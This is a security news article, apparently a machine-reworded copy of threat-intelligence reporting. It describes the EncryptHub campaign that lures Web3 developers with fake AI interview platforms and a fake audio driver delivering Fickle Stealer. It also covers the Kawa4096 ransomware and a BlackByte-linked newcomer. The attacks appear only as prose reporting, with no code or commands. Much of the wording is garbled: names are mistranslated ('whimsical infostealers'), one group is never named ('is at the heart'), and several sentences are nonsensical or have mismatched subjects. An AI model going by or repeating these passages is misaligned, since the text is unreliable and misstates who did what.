The financially motivated threat actor known as Encrypthub (aka Larva-208 and Water Gamayun) is attributed to a new campaign aimed at Web3 developers getting infected with information Stealer malware.
“Larva-208 uses fake AI platforms (such as Norlax AI, TeamPilot imitations) to evolve tactics and invite victims with job postings or portfolio review requests.”
The group has a history of ransomware deployment, but the latest findings show the evolution of its tactics and diversifying how it monetizes by using Stealer malware to collect data from cryptocurrency wallets.
The focus of Encrypthub, which focuses on Web3 developers, is not random. These individuals often manage crypto wallets, access to smart contract repository, or sensitive testing environments. Many operate as freelancers or work on multiple decentralized projects, making it difficult to protect with traditional enterprise security controls. This decentralized, high-value developer community provides an ideal target for attackers who are looking to monetize quickly without triggering centralized defenses.
The attack chain must direct potential targets to the deceptive artificial intelligence (AI) platform and direct them to click on aggregation links within these sites.
Meeting links to these sites are sent to developers who follow Web3 and blockchain-related content via platforms such as X and Telegram, under the pretext of job interviews and portfolio discussions. It turns out that the threat actors are sending Meeting links to those who applied for positions they posted to the Web3 job board called Remote3.
What’s interesting is the approach that attackers use to avoid security warnings issued by Remote3 on their site. Given that the service explicitly warns job seekers against unfamiliar video conferencing software downloads, the attacker will have their first conversation through Google Meet, in the meantime, instructing the applicant to resume interviews with Norlax AI.
Regardless of the method used, when the victim clicks on the meeting link, he is asked to enter his email address and invitation code, and then he is provided with a fake error message about an outdated or missing audio driver.
Clicking on the message will lead to downloading malicious software disguised as a real RealTek HD audio driver. This will run the PowerShell command to get and expand Fickle Stealer. Information collected by the Stealer malware is sent to an external server codenamed SilentPrism.
“Threat actors can distribute whimsical infostealers through fake AI applications and successfully harvest cryptocurrency wallets, development qualifications, and sensitive project data,” Prodaft said.
“This latest operation suggests a shift towards alternative monetization strategies that include removal of valuable data and credentials for potential resale or exploitation in illegal markets.”
The development is an attempt to enrich visibility and reliability by following the style of the Akira ransomware group and a similar ransom note format as Qilin, as Trustwave SpiderLabs detailing a new ransomware stock called Kawa4096.
Kawa4096, which first appeared in June 2025, targets 11 companies, with the most targets in the US and Japan. The initial access vector used in the attack is unknown.
Notable features of Kawa4096 are the ability to encrypt files on a shared network drive and the ability to use multi-threaded to increase operational efficiency and speed up the scanning and encryption process.
“After identifying valid files, the ransomware adds them to the sharing queue,” said security researchers Nathaniel Morales and John Basmayor. “This queue is processed by a pool of worker threads responsible for getting the file path and passing it to the encryption routine. The semaphore is used for synchronization between threads to ensure efficient processing of the file queue.”
Another new entrant to the ransomware landscape is at the heart, claiming that this is part of the Blackbyte group, unfolding wildly in three incidents detected per huntress on July 4th and 13th, 2025.
In one incident, threat actors are known to leverage valid credentials via RDP to obtain scaffolding for the target network. All attacks have in common with legitimate Windows tools such as SVChost.exe and bcdedit.exe to modify the boot configuration to hide malicious commands and block system recovery.
“Threat actors also clearly prefer legitimate processes such as BCDEDIT.EXE and svChost.exe, so continuing monitoring of suspicious behavior using these processes via endpoint detection and response (EDR) helps to attack environmental threat actors,” Huntress said.
Source link
